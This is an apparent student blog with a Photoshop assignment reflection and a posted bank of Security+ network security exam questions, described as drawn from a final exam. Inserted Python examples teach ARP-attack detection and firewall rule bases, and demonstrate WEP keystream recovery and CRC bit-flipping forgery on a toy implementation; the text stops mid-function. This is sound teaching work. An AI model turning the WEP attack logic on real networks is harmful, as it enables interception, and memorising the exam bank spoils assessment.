Saturday, December 31, 2011

GEM Adobe Photoshop CS5


In this Assignment 2, the greatest obstacle that I faced along the way was deciding on an innovative idea for how to start a piece of digital art. Browsing some of the artwork on the internet provided me with various ideas and inspirations. However, most of the ideas did not get me anywhere. For instance, taking a picture of an old classic camera is difficult, as it is extremely rare to find one of those these days.

While working on the pictures of the construction vehicles, I personally made a trip down to a few construction sites to ask for permission to take photos. However, they did not allow me to enter any of the construction sites due to their safety rules. Therefore, I decided to change my project and chose one of the robot figures well known as the "Mobile Suits" for my assignment. As a kid, I used to watch robot-related TV programmes such as Transformers, Gundam and Astro Boy. Collecting robot figures eventually became my favourite hobby as I developed a deep interest in them.
I have chosen this specific robot for my assignment because it holds memorable value to me.

This robot was a gift from my childhood friend, who passed away 3 years ago, as my 21st birthday present, with both of our names neatly carved on it. I really hope that I can do something on this assignment to make her proud. Despite the obstacles that I faced while working on this assignment, such as time constraints, I somehow managed to overcome all of them by putting in all of my effort.

To summarise, what I have gained from this assignment is a vital part of our polytechnic education and also an important factor when we start a career in the future. Not only does this assessment provide a strong basis for resolving everyday issues, it also undoubtedly helps us to handle situations with a positive approach. Any type of work in any industry in any nation has its own type of projects or assignments, so it is important for us to get ready and be prepared for any future challenges that await us.



Distinction!! Thanks a lot.. my childhood friend (Ying hong)

Monday, December 12, 2011

ET0522 NETWORK SECURITY SYSTEMS

Security+ Guide to Network Security Fundamentals

Chapter 1


(Note: there are a total of 400 questions for the final exam, of which 200 are provided here, as I do not have enough time to upload all of them.) <50% of the questions will come out during the exam>
I will send the additional 200 questions to your email account <another 50% will come out from there, making up 100% in total>. Sorry for any inconvenience caused.


1. Each of the following is a reason why it is difficult to defend against today’s attackers except _____________ .

A. speed of attacks
B. greater sophistication of attacks
C. complexity of attack tools
D. delays in patching hardware and work software products

2. A(n) _____ attack takes advantage of vulnerabilities that have not been previously revealed.

A. zero day
B. quick vulnerability assessment (QVA)
C. glamour
D. signature-based attack

3. _____ ensures that only authorized parties can view the information.

A. Availability
B. Integrity
C. Confidentiality
D. ICA

4. Each of the following is a successive layer in which information security is achieved except _________________.

A. products
B. people
C. procedures
D. Intrusion Wormhole Defense (IWD)

5. A(n) _____ is a person or thing that has the power to carry out a threat.

A. vulnerability
B. threat agent
C. exploit
D. risk factor

6. Each of the following is a goal of information security except __________.

A. Prevent data theft
B. Decrease user productivity
C. Avoid legal consequences
D. Foil cyberterrorism

7. The _____ requires that enterprises must guard protected health information and implement policies and procedures to safeguard it.

A. Health Insurance Portability and Accountability Act (HIPAA)
B. Sarbanes-Oxley Act (Sarbox)
C. Gramm-Leach-Bliley Act (GLBA)
D. Hospital Protection and Insurance Association Agreement (HPIAA)

8. Utility companies, telecommunications, and financial services are considered prime targets of _____ because attackers can significantly disrupt business and personal activities by destroying a few targets.

A. cyberterrorists
B. kiddie scripters
C. computer spies
D. blue hat hackers (BHH)

9. After an attacker probed a computer or network for information she would next ________.

A. modify security settings
B. penetrate any defenses
C. paralyze networks and devices
D. circulate to other systems

10. An organization that purchased security products from different vendors in case an attacker circumvented the Brand A device, yet would have more difficulty trying to break through a Brand B device because they are different, is an example of ________.

A. obscurity
B. layering
C. limiting
D. diversity

11. _____ is a superset of information security and includes security issues that do not involve computers.

A. Google reconnaissance
B. Risk security (RS)
C. Information assurance (IA)
D. Asset restriction (AR)

12. _____ attacks come from multiple sources instead of a single source.

A. Distributed
B. Isolated
C. Script resource malware (SRM)
D. Form resource

13. _____ are a loose-knit network of attackers, identity thieves, and financial fraudsters.

A. Cybercriminals
B. Hackers
C. Spies
D. Script kiddies

14. Each of the following is a characteristic of cybercriminals except ________.

A. low motivation
B. less risk-averse
C. better funded
D. more tenacious

15. Each of the following is a characteristic of cybercrime except ________.

A. targeted attacks against financial networks
B. unauthorized access to information
C. theft of personal information
D. exclusive use of worms and viruses

16. An example of a(n) _____ is a software defect in an operating system that allows an unauthorized user to gain access to a computer without a password.

A. vulnerability
B. threat
C. threat agent
D. asset exploit (AE)

17. _____ requires banks and financial institutions to alert customers of their policies and practices in disclosing customer information and to protect all electronic and paper records containing personally identifiable financial information.

A. California Savings and Loan Security Act (CS&LSA)
B. USA Patriot Act
C. Sarbanes-Oxley Act (Sarbox)
D. Gramm-Leach-Bliley Act (GLBA)

18. The term _____ is commonly used in a generic sense to identify anyone who illegally breaks into a computer system.

A. hacker
B. cyberterrorist
C. Internet Exploiter
D. cyberrogue

19. An example of _____ would be not revealing the type of computer, operating system, software, and network connection a computer uses.

A. diversity
B. limiting
C. obscurity
D. layering

20. The _____ is primarily responsible for assessment, management, and implementation of security.

A. Chief Information Security Officer (CISO)
B. security manager
C. security administrator
D. security technician


Chapter 2

1. A(n) _____ is a program that secretly attaches itself to a carrier such as a document or program and then executes when that document is opened or program is launched.

A. virus
B. worm
C. rootkit
D. Trojan

2. The first action that a virus takes once it infects a computer is to

A. close all ports
B. erase the payload
C. authenticate
D. replicate

3. Each of the following is a different type of computer virus except

A. file infector virus
B. remote virus
C. resident virus
D. boot virus

4. A computer program that pretends to clean up a hard drive but actually performs a malicious activity is known as a(n)

A. Trojan
B. rootkit
C. worm
D. logic bomb

5. To remove a rootkit from a computer you should

A. erase all files in the WINNT folder
B. expand the Master Boot Record
C. reformat the hard drive and reinstall the operating system
D. flash the ROM BIOS

6. Each of the following could be a logic bomb except

A. Erase all data if John Smith’s name is removed from the list of employees
B. Reformat the hard drive three months after Susan Jones left the company
C. Send spam to all employees
D. If the company’s stock price drops below $10 then credit Jeff Brown with ten additional years of retirement credit

7. _____ is a technique used by spammers to horizontally separate words so they are not trapped by a filter yet can still be read by the human eye.

A. Word splitting
B. Word layering
C. Parsing
D. Speckling

8. _____ is an image spam that is divided into multiple images and each piece of the message is divided and then layered to create a complete and legible message.

A. GIF layering
B. word splitting
C. geometric variance
D. split painting

9. _____ is a general term used for describing software that violates a user’s personal security.

A. Spamware
B. Warezware
C. Adaware
D. Spyware

10. A(n) _____ is either a small hardware device or a program that monitors each keystroke a user types on the computer's keyboard.

A. keylogger
B. macro
C. script kiddie
D. port replicator

11. Attackers use _____ to remotely control zombies.

A. Google
B. e-mail
C. spam
D. Internet Relay Chat (IRC)

12. On modern computer systems the BIOS is stored on a _____ chip.

A. Silver flash
B. Basic Output/Input
C. Programmable Read Only Memory (PROM)
D. Read Only Memory (ROM)

13. Each of the following is an advantage of a USB device except

A. slower speed
B. nonvolatile
C. better shock resistance
D. tolerates temperature extremes

14. _____ is a single, dedicated hard disk-based file storage device that provides centralized and consolidated disk storage that is available to users through a standard network connection.

A. Storage Area Network (SAN)
B. Network Attached Storage (NAS)
C. Attached Device Repository (ADR)
D. Network Data Pool (NDP)

15. Each of the following is an attack that can be used against cell phones except

A. Lure users to malicious websites
B. Infect the cell phone with malware
C. Attack other cell phone users
D. Turn off the cell phone

16. The ability to move a virtual machine from one physical computer to another with no impact on users is called ____.

A. server balancing
B. VLAN segmentation
C. hypervisor storage
D. live migration

17. The _____ is the software that runs on a physical computer and manages multiple virtual machine operating systems.

A. virtual resource allocator (VRA)
B. hypervisor
C. Microsoft Control Plug-in
D. hardware allocator

18. _____ is exploiting a vulnerability in the software to gain access to resources that the user would normally be restricted from obtaining.

A. Vulnerability assessment
B. Software threat release (STR)
C. Hardware virus
D. Privilege escalation

19. Each of the following is a reason why adware is scorned except

A. It displays objectionable content
B. It can cause a computer to crash or slow down
C. It can interfere with a user’s productivity
D. It displays the attacker's programming skills

20. An attacker who controls multiple zombies in a botnet is known as a(n)

A. Bot herder
B. Zombie shepherd
C. Rogue IRC
D. Cyber-Robot

Chapter 3

1. A(n) _____ is a general software security update intended to cover vulnerabilities that have been discovered.

A. service pack
B. hotfix
C. patch
D. critical update

2. Each of the following is an advantage of an automated patch update service except

A. Users can download the patch immediately when it is released
B. Bandwidth can be saved because each computer does not have to connect to an external server
C. Reports can be obtained regarding what updates each system needs
D. Users cannot circumvent updates

3. Attackers use buffer overflows to

A. point to another area in data memory that contains the attacker’s malware code
B. corrupt the kernel so the computer cannot reboot
C. place a virus into the kernel
D. erase buffer overflow signature files

4. The Windows application _____ will not allow code in the memory area to be executed.

A. Dynamic Memory Expansion Restriction (DMER)
B. Buffer Overflow Prevention (BOP)
C. Execute Bit (EXB)
D. Data Execution Prevention (DEP)

5. Each of the following is a step that most security organizations take to configure operating system protection except

A. Develop a security policy
B. Create configuration baselines
C. Create security templates
D. Deploy nX randomization

6. A cookie that was not created by the Web site that attempts to access it is called a(n)

A. first-party cookie
B. second-party cookie
C. third-party cookie
D. fourth-party cookie

7. _____ resides inside an HTML document.

A. ActiveX
B. JavaScript
C. Java
D. Virtual Machine (VM)

8. A Java applet _____ is a barrier that surrounds the applet to keep it away from resources on the local computer.

A. fence
B. sandbox
C. playpen
D. Java Container Closed Object (JCCO)

9. Address Space Layout Randomization (ASLR) randomly assigns _____ to one of several possible locations in memory.

A. executable operating system code
B. xN bits
C. DEP
D. sockets

10. The TCP/IP protocol _____ handles outgoing mail.

A. Post Office Protocol (POP)
B. Simple Mail Transfer Protocol (SMTP)
C. IMAP4
D. Microsoft Mail Transport (MMT)

11. Instant Messaging (IM) connects two systems

A. through the IM server
B. directly without using a server
C. only in a remote chat session
D. using Internet Relay Chat (IRC)

12. With a(n) _____ network users do not search for a file but download advertised files.

A. BitTorrent
B. P2P
C. swarm
D. RCIP

13. Another name for antivirus definition files is

A. signature files
B. virus resource entities (VRE)
C. AV patches
D. SigDef

14. The preferred location for a spam filter is

A. on the SMTP server
B. on the POP3 server
C. integrated into the network firewall
D. on the DHCP client

15. A(n) _____ is a list of pre-approved e-mail addresses that the user will accept mail from.

A. blacklist
B. client access account (CAA)
C. whitelist
D. POP3 transfer list

16. Another name for a packet filter is a(n)

A. firewall
B. HIDS
C. SQL eliminator
D. SIDS

17. A(n) _____ works on the principle of comparing new behavior against normal behavior.

A. Host Intrusion Detection System (HIDS)
B. packet filter
C. Internet Resource Chat (IRC)
D. personal software firewall

18. A(n) _____ is a cumulative package of all security updates plus additional features.

A. service pack
B. update
C. update rollup
D. hotfix patch

19. A(n) _____ is a method to configure a suite of configuration baseline security settings.

A. security template
B. group policy
C. snap-out
D. Active Directory Planner

20. A(n) _____ is a program that does not come from a trusted source.

A. ActiveX Controller Entity
B. signed JavaScript application
C. JavaScript applet
D. unsigned Java applet

Chapter 4

1. A network tap____________________.

A. has been made obsolete by software protocol analyzers
B. is a separate device that can be installed between other network devices to monitor traffic
C. stands for “Technology Account Protocol” (TAP)
D. is the same as a wireless access point

2. Each of the following is a characteristic of a weak password except_________.

A. Using a common dictionary word
B. Using personally identifiable information
C. A password that is long
D. Recording the password on paper

3. A(n) _____ is an account on a device that is created automatically to aid in installation and should be deleted once that is completed.

A. default account
B. back door
C. User Installation Account (UIA)
D. privilege account

4. A(n) _____ attack attempts to consume network resources so that the devices cannot respond to legitimate requests.

A. system overflow
B. Denial of service
C. reverse ping
D. ARP spoofing

5. Wireless denial of service attacks are successful because wireless LANs use the protocol____________.

A. Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA)
B. Carrier Sense Multiple Access with Collision Detection (CSMA/CD)
C. time slot allocation (TSA)
D. implicit ACK frame acknowledgment protocol (IAFAP)

6. A man-in-the-middle attack_________________.

A. can be defeated by using the TCP/IP protocol
B. intercepts legitimate communication and forges a fictitious response
C. is only found on a wireless network
D. is always passive

7. The difference between a replay attack and a man-in-the-middle attack is________.

A. Replay attacks are always faster
B. A replay attack makes a copy of the transmission before sending it to the recipient
C. A man-in-the-middle attack can be prevented yet a replay attack cannot
D. Replay attacks are no longer used today

8. An example of an antiquated protocol that has been replaced by a more secure version is______________.

A. Simple Network Management Protocol (SNMP) Version 2
B. Address Resolution Protocol
C. Internet Protocol
D. ARPA

9. Where does the TCP/IP host table name system for a local device store a symbolic name to Internet Protocol address mappings?

A. On the Domain Name System (DNS) server
B. In a local hosts file
C. In the ARP cache
D. On a network file server

10. Attackers take advantage of Domain Name System _____ to send fraudulent DNS entries.

A. area requests
B. domain resource sharing (DRS)
C. Internet name system transfer protocol
D. zone transfers

11. A more secure version of the Berkeley Internet Name Domain software is______.

A. Total Secure Domain Name System Zone (TSDNSZ)
B. Secure BIND
C. MX Secure (MXS)
D. DNSSEC

12. _____ is used for Ethernet local area networks to resolve Internet Protocol addresses.

A. ARP
B. P2P
C. CCSIP
D. I4PR

13. An attack that takes advantage of the order of arrival of TCP packets is_______.

A. IP forwarding
B. FTP spoofing
C. IP resolution
D. TCP/IP hijacking

14. War driving exploits _____, which is the wireless access point sending out information about its presence and configuration settings.

A. scanning
B. beaconing
C. location frame stamping
D. SGP mapping

15. A group of Bluetooth piconets in which connections exist between different piconets is called a(n)__________.

A. scatternet
B. OPNET
C. double piconet (DP)
D. slavenet

16. _____ is the unauthorized access of information from a wireless device through a Bluetooth connection.

A. Blue jacking
B. Bluetooth snatching
C. Bluetooth spoofing
D. Blue snarfing

17. In a(n) _____ attack the attacker overflows a switch’s address table with fake media access control (MAC) addresses and makes the switch act like a hub, sending packets to all devices.

A. switch flooding
B. MAC ARP impersonation
C. Address Domain Resolution (ADR)
D. switch advertisement

18. A back door can be created by each of the following except______________.

A. a programmer of the software on the device
B. a virus
C. spam
D. a Trojan horse

19. Using _____, an attacker attempts to gather information to map the entire internal network of the organization supporting the DNS server.

A. DNS transfer
B. DNS spoofing
C. Zone transfer imaging (ZTI)
D. Name resolution spoofing

20. Each of the following could be the result of an ARP poisoning attack except________.

A. Change entries in a DNS zone transfer table
B. Steal data intended for another device
C. Force a switch to revert to a hub
D. Prevent Internet access to users on a network
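
The ARP questions above (ARP resolution, MAC flooding, ARP poisoning) describe attacks on the IP-to-MAC binding; the natural defensive counterpart is an arpwatch-style monitor that keeps its own table of bindings and alerts when they change. The following Python is an added example written for this page (it is not from the textbook or the blog author) and runs over a constructed list of ARP replies, so it works offline. It flags the two symptoms the questions describe: an IP whose MAC suddenly changes, one MAC answering for several IPs (what a gateway impersonator looks like), and a switch port that sees an implausible number of distinct source MACs in a short window (switch/MAC flooding). The port names, addresses and thresholds are assumptions chosen for the demo.

```python
# Added example (not from the textbook or the blog): a minimal ARP monitor in the
# spirit of arpwatch. It reads a constructed list of ARP replies and flags:
#   - an IP whose MAC suddenly changes (ARP poisoning / man-in-the-middle),
#   - one MAC claiming several IPs (gateway impersonation),
#   - a port that sees many distinct source MACs in a short window (MAC flooding).
from collections import defaultdict

# Constructed sample: (timestamp_seconds, switch_port, sender_ip, sender_mac).
# 192.168.1.1 is the gateway; at t=105 a second host starts claiming it.
SAMPLE_REPLIES = [
    (100, "Gi1/0/1", "192.168.1.1",  "00:11:22:33:44:01"),
    (101, "Gi1/0/2", "192.168.1.10", "00:11:22:33:44:10"),
    (102, "Gi1/0/3", "192.168.1.11", "00:11:22:33:44:11"),
    (105, "Gi1/0/7", "192.168.1.1",  "de:ad:be:ef:00:07"),   # gateway IP, new MAC
    (106, "Gi1/0/7", "192.168.1.10", "de:ad:be:ef:00:07"),   # same MAC claims a 2nd IP
] + [
    # 300 replies in 2 seconds from one port, each with a fresh source MAC
    (110 + i // 150, "Gi1/0/9", f"10.0.{i // 256}.{i % 256}",
     f"02:00:00:00:{i // 256:02x}:{i % 256:02x}")
    for i in range(300)
]

FLOOD_THRESHOLD = 50    # distinct MACs per port per window before we call it flooding (assumed)
FLOOD_WINDOW = 10       # seconds (assumed)

def analyze(replies):
    """Return a list of (kind, detail) alerts for the given ARP replies."""
    alerts = []
    ip_to_mac = {}                              # last known binding per IP
    mac_to_ips = defaultdict(set)               # which IPs each MAC has claimed
    port_window = defaultdict(list)             # port -> [(ts, mac), ...] inside the window
    flooded_ports = set()
    for ts, port, ip, mac in replies:
        # 1. ARP poisoning: the IP was bound to a different MAC before
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(("ip_mac_change", f"{ip}: {prev} -> {mac} on {port} at t={ts}"))
        ip_to_mac[ip] = mac
        # 2. One MAC answering for several IPs is how a gateway impersonator looks
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == 2:
            alerts.append(("mac_claims_multiple_ips",
                           f"{mac} now claims {sorted(mac_to_ips[mac])}"))
        # 3. MAC flooding: distinct source MACs per port inside a sliding time window
        port_window[port].append((ts, mac))
        port_window[port] = [(t, m) for t, m in port_window[port] if ts - t <= FLOOD_WINDOW]
        distinct = {m for _, m in port_window[port]}
        if len(distinct) >= FLOOD_THRESHOLD and port not in flooded_ports:
            flooded_ports.add(port)
            alerts.append(("mac_flooding",
                           f"{port}: {len(distinct)} distinct MACs within {FLOOD_WINDOW}s"))
    return alerts

if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_REPLIES):
        print(f"[{kind}] {detail}")
```

On a real network the replies would come from a capture (e.g. a SPAN port or a network tap, as in question 1) rather than a list, and the thresholds would be tuned per port; the point is that ARP has no authentication, so the only defence short of static entries or switch features such as dynamic ARP inspection is to notice when a binding moves.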

Chapter 5

1. Subnetting ____________________.

A. splits the network IP address on the boundaries between bytes
B. is also called subnet addressing
C. provides very limited security protection
D. requires the use of a Class C network

2. A virtual LAN (VLAN) allows devices to be grouped _____________.

A. logically
B. based on subnets
C. only around core switches
D. directly to routers

3. Convergence combines voice, data, and video traffic ____________.

A. over a single IP network
B. through hubs
C. one stream at a time
D. only on wireless networks

4. Each of the following is a convergence security vulnerability except __________.

A. convergence resource attacks (CRA)
B. VoIP protocols
C. spam
D. lack of encryption

5. Which of the following is not true regarding a demilitarized zone (DMZ)?

A. It contains servers that are only used by internal network users
B. It typically has an e-mail or Web server
C. It can be configured to have one or two firewalls
D. provides an extra degree of security

6. Network address translation (NAT) _________________.

A. substitutes MAC addresses for IP addresses
B. can only be found on core routers
C. removes private addresses when the packet leaves the network
D. can be stateful or stateless

7. Each of the following is a variation available in network access control (NAC) implementations except ____________.

A. Client or clientless
B. Switch, inline, or out-of-band
C. Network or local
D. Pre-connect or post-connect

8. Another name for a packet filter is a(n) __________________.

A. DMZ
B. firewall
C. proxy server
D. honeypot

9. The _____ establishes the action that a firewall takes on a packet.

A. host cache
B. rule base
C. syntax table
D. packet outline

10. A(n) _____ intercepts internal user requests and then processes that request on behalf of the user.

A. proxy server
B. content filter
C. intrusion prevention device
D. host detection server

11. A reverse proxy _________________.

A. is the same as a proxy server
B. routes incoming requests to the correct server
C. must be used together with a firewall
D. only handles outgoing requests

12. A honeypot is used for each of the following except ____________.

A. Deflect attention away from real servers
B. Filter packets before they reach the network
C. Provide early warning of new attacks
D. Examine attacker techniques

13. A(n) _____ watches for attacks but only takes limited action when one occurs.

A. network intrusion detection system (NIDS)
B. network intrusion prevention system (NIPS)
C. proxy intrusion device
D. firewall

14. A multipurpose security appliance integrated into a router is known as a(n) _______.

A. unified attack management system (UAMS)
B. integrated network security hardware device
C. intrusion detection/prevention device
D. proxy security system (PSS)

15. Each of the following can be used to hide information about the internal network except ___________.

A. Network address translation (NAT)
B. Proxy server
C. subnetting
D. protocol analyzer

16. The difference between a network intrusion detection system (NIDS) and a network intrusion prevention system (NIPS) is ___________.

A. A NIDS provides more valuable information about attacks
B. A NIPS is much slower because it uses protocol analysis
C. A NIPS can take extended actions to combat the attack
D. There is no difference because a NIDS and a NIPS are equal

17. A variation of NAT that is commonly found on home routers is _______.

A. Network address IP transformation (NAIPT)
B. Port address translation (PAT)
C. Network proxy translation (NPT)
D. Subnet transformation (ST)

18. If a device is determined to have an out-of-date virus signature file then Network Access Control (NAC) can redirect that device to a network by _______.

A. Address Resolution Protocol (ARP) poisoning
B. TCP/IP hijacking
C. DHCP man-in-the-middle
D. a Trojan horse

19. Each of the following is an option in a firewall rule base except _______.

A. delay
B. prompt
C. block
D. allow

20. A firewall using _____ is the most secure type of firewall.

A. stateful packet filtering
B. network intrusion detection system replay
C. reverse proxy analysis
D. stateless packet filtering
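
Several of the questions above (subnetting, the firewall rule base, the allow/block/prompt options, stateless versus stateful filtering) come together in one small piece of code. The following Python is an added example written for this page (not from the textbook or the blog author): a toy stateless packet filter whose rule base is evaluated top-down, first match wins, and which falls through to an implicit deny when no rule matches. The addresses (RFC 5737 documentation ranges), ports and rule set are assumptions constructed for the demo; CIDR matching uses the standard library's ipaddress module.

```python
# Added example (not from the textbook or the blog): a toy stateless packet filter.
# The rule base is evaluated top-down; the first matching rule decides the action;
# a packet that matches nothing is rejected (implicit deny).
import ipaddress

ANY = None   # wildcard for protocol, address and port fields

class Rule:
    def __init__(self, action, proto=ANY, src=ANY, sport=ANY, dst=ANY, dport=ANY, comment=""):
        self.action = action                       # "allow", "block" or "prompt"
        self.proto = proto
        self.src = ipaddress.ip_network(src) if src is not ANY else ANY
        self.dst = ipaddress.ip_network(dst) if dst is not ANY else ANY
        self.sport = sport
        self.dport = dport
        self.comment = comment

    def matches(self, pkt):
        ip_src = ipaddress.ip_address(pkt["src"])
        ip_dst = ipaddress.ip_address(pkt["dst"])
        return ((self.proto is ANY or self.proto == pkt["proto"])
                and (self.src is ANY or ip_src in self.src)      # CIDR / subnet match
                and (self.dst is ANY or ip_dst in self.dst)
                and (self.sport is ANY or self.sport == pkt["sport"])
                and (self.dport is ANY or self.dport == pkt["dport"]))

# Constructed rule base for an outside interface protecting a DMZ web server at 203.0.113.10
RULE_BASE = [
    Rule("block", src="10.0.0.0/8", comment="private source arriving from outside: spoofed"),
    Rule("allow", proto="tcp", dst="203.0.113.10/32", dport=443, comment="HTTPS to DMZ web server"),
    Rule("allow", proto="tcp", dst="203.0.113.10/32", dport=80, comment="HTTP to DMZ web server"),
    Rule("prompt", proto="tcp", src="203.0.113.0/24", dport=22, comment="SSH from inside the DMZ: ask"),
    Rule("allow", proto="icmp", dst="203.0.113.0/24", comment="ping for monitoring"),
    # no catch-all rule: anything not listed above is rejected (implicit deny)
]

def filter_packet(rule_base, pkt):
    """Return (action, reason). First matching rule wins; implicit deny otherwise."""
    for rule in rule_base:
        if rule.matches(pkt):
            return rule.action, rule.comment
    return "block", "implicit deny"

def pkt(proto, src, dst, sport=0, dport=0):
    """Build a packet header summary; only the fields a stateless filter looks at."""
    return {"proto": proto, "src": src, "dst": dst, "sport": sport, "dport": dport}

if __name__ == "__main__":
    samples = [
        pkt("tcp", "198.51.100.7", "203.0.113.10", 51000, 443),   # normal HTTPS client
        pkt("tcp", "10.1.2.3", "203.0.113.10", 51000, 443),       # spoofed private source
        pkt("tcp", "198.51.100.7", "203.0.113.10", 51000, 3306),  # MySQL from the Internet
        pkt("tcp", "203.0.113.20", "203.0.113.10", 51000, 22),    # SSH from inside the DMZ
        pkt("icmp", "198.51.100.7", "203.0.113.10"),
    ]
    for p in samples:
        print(f'{p["src"]} -> {p["dst"]}:{p["dport"]} {p["proto"]}: {filter_packet(RULE_BASE, p)}')
```

Because this filter looks at each packet in isolation, it cannot tell a reply belonging to an established connection from an unsolicited packet that merely carries the right ports; a stateful packet filter adds a connection table and consults it before the rule base, which is why it is the stronger of the two.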

Chapter 6

1. The amendment to add 5.5 Mbps and 11 Mbps to the IEEE 802.11 standard is ______.

A. IEEE 802.11a
B. IEEE 802.11b
C. IEEE 802.11g
D. IEEE 802.11n

2. Access to the wireless network can be restricted by _______.

A. MAC address filtering
B. ARP resolution
C. TKIP encryption
D. WEP authentication

3. The cyclic redundancy check (CRC) is also called the _______.

A. integrity check value (ICV)
B. initialized vector resource (IVR)
C. check parity bit (CPB)
D. R5C check

4. A wireless network requires that the _____ be authenticated first.

A. user
B. thick wireless device
C. wireless device
D. authentication probe

5. The Service Set Identifier (SSID) _____.

A. serves as the network name for a WLAN
B. is only used on IEEE 802.11g networks
C. is optional on all networks
D. is used only with closed system authentication

6. The optional authentication method that forces the wireless device to encrypt challenge text using its WEP encryption key is known as _____ .

A. WEP encryption
B. shared key authentication
C. challenge text verification (CTV)
D. AP authentication (APA)

7. Each of the following is a weakness of open system authentication except _______.

A. SSIDs are by default contained in beacon frames to all wireless devices
B. turning off SSIDs can hinder roaming
C. SSIDs are transmitted in other management frames sent by the access point
D. open system authentication requires an authentication server

8. The weakness of WEP is that _____.

A. it requires the use of an enhanced access point (EAP) for it to function properly
B. it is costly to implement
C. the encryption algorithm has been broken by attackers
D. the initialization vectors (IVs) are repeated

9. The two models for personal wireless security developed by the Wi-Fi Alliance are Wi-Fi Protected Access (WPA) and _____ .

A. Protected Wireless Security (WPS)
B. IEEE 802.11x
C. Postshared Key Protection (PKP)
D. Wi-Fi Protected Access 2 (WPA2)

10. The _____ replaces the cyclic redundancy check (CRC) and is designed to prevent an attacker from capturing, altering, and resending a data packet.

A. Message Integrity Check (MIC)
B. Cyclic Redundancy Check 2 (CRC2)
C. Wi-Fi CRC
D. Wireless Parity Check (WPC)

11. The IEEE standard for wireless security is known as _____ .

A. IEEE 803.x
B. IEEE Wi-Fi Protected Access
C. IEEE 802.11i
D. IEEE PSK

12. A(n) _____ is designed to verify the authentication of wireless devices using IEEE 802.1x.

A. proxy ID server
B. access point server
C. check point server
D. authentication server

13. Wireless switches are used in conjunction with _____ for increased security by moving security features to the switch.

A. authentication access points (AAPs)
B. network intrusion prevention system (NIPS)
C. access control appliances (ACA)
D. thin access points

14. Separate _____ can be used to support low-security guest Internet access and high-security administrators on the same access point.

A. wireless virtual local area networks (VLANs)
B. segmented access points
C. separated wireless streams (SWS)
D. proxy security servers

15. Each of the following can be used to monitor airwaves for traffic except a(n) _____.

A. dedicated probe
B. access point probe
C. resource monitor probe
D. wireless device probe

16. A WEP key that is 128 bits in length _____ .

A. has an initialization vector (IV) that is the same length as a WEP key of 64 bits
B. is less secure than a WEP key of 64 bits because shorter keys are better
C. cannot be cracked because it is too long
D. cannot be used on access points that use passphrases

17. For a SOHO the best security model would be the _____ .

A. Wi-Fi Protected Access Personal Security model
B. Enterprise Protection Personal Security model
C. IEEE Wi-Fi Personal Protection model
D. Wi-Fi Protected Access 2 Personal Security model

18. Preshared key (PSK) authentication requires that the encryption key _____.

A. must be entered on all devices prior to wireless communication occurring
B. be the same length as the Initialization Vector (IV)
C. be entered in hexadecimal notation on the access point
D. be encrypted before it can be entered by a user on a wireless device

19. _____ stores information from a device on the network so if a user roams away from a wireless access point and later returns, he does not need to re-enter all of the credentials.

A. Key-caching
B. Pre-key authentication
C. Key roaming
D. Security key resolution

20. The _____ model is designed for medium to large-size organizations in which an authentication server is available.

A. IEEE 802.11d
B. Wi-Fi Academic
C. WPA 2 Enterprise Security
D. Wi-Fi 802.x
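
Questions 3, 8, 10 and 16 above turn on two properties of WEP that are easiest to see with actual bytes: the 24-bit IV repeats (and stays 24 bits even with a 128-bit key), so the RC4 keystream gets reused; and the CRC-32 integrity check value is linear, so a frame can be modified in flight without the key. The following Python is an added example written for this page (not from the textbook or the blog author). It builds a miniature WEP encryptor on RC4, shows what an attacker gets from an IV repeat, shows the bit-flipping attack on the CRC ICV, and then replaces the CRC with a keyed message integrity check. The 40-bit key, IV and frame contents are constructed; the keyed MIC uses a truncated HMAC-SHA256 as a stand-in for illustration, not TKIP's actual Michael algorithm.

```python
# Added example (not from the textbook or the blog): a miniature WEP on RC4 used
# to show (1) keystream reuse when an IV repeats and (2) the CRC-32 ICV being
# patchable by an attacker, versus a keyed MIC that is not.
import hmac
import hashlib
import zlib

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream) XORed over data; illustration only."""
    S = list(range(256))
    j = 0
    for i in range(256):                                  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:                                        # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """64-bit WEP: 24-bit IV in the clear, then RC4(IV||key) over data || CRC-32 ICV."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + secret, plaintext + icv)

def wep_decrypt(secret: bytes, frame: bytes):
    """Return (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + secret, body)
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, zlib.crc32(plaintext).to_bytes(4, "little") == icv

def recover_from_iv_reuse(frame1: bytes, frame2: bytes, known_plaintext1: bytes) -> bytes:
    """Same IV twice: C1 xor C2 = P1 xor P2, so knowing P1 reveals P2 without the key."""
    assert frame1[:3] == frame2[:3], "only works when the IV repeats"
    return xor(xor(frame1[3:], frame2[3:]), known_plaintext1)[:len(known_plaintext1)]

def bit_flip(frame: bytes, delta: bytes) -> bytes:
    """Flip plaintext bits (delta covers the data part) and fix the encrypted ICV.
    CRC-32 is affine: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros), so the correction
    needs neither P nor the key."""
    iv, body = frame[:3], frame[3:]
    data_c, icv_c = body[:-4], body[-4:]
    fix = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return iv + xor(data_c, delta) + xor(icv_c, fix.to_bytes(4, "little"))

# --- keyed integrity check, the idea behind the MIC that replaced the CRC ---
def mic_encrypt(secret: bytes, mic_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    mic = hmac.new(mic_key, plaintext, hashlib.sha256).digest()[:8]   # stand-in 64-bit MIC
    return iv + rc4(iv + secret, plaintext + mic)

def mic_decrypt(secret: bytes, mic_key: bytes, frame: bytes):
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + secret, body)
    plaintext, mic = data[:-8], data[-8:]
    expected = hmac.new(mic_key, plaintext, hashlib.sha256).digest()[:8]
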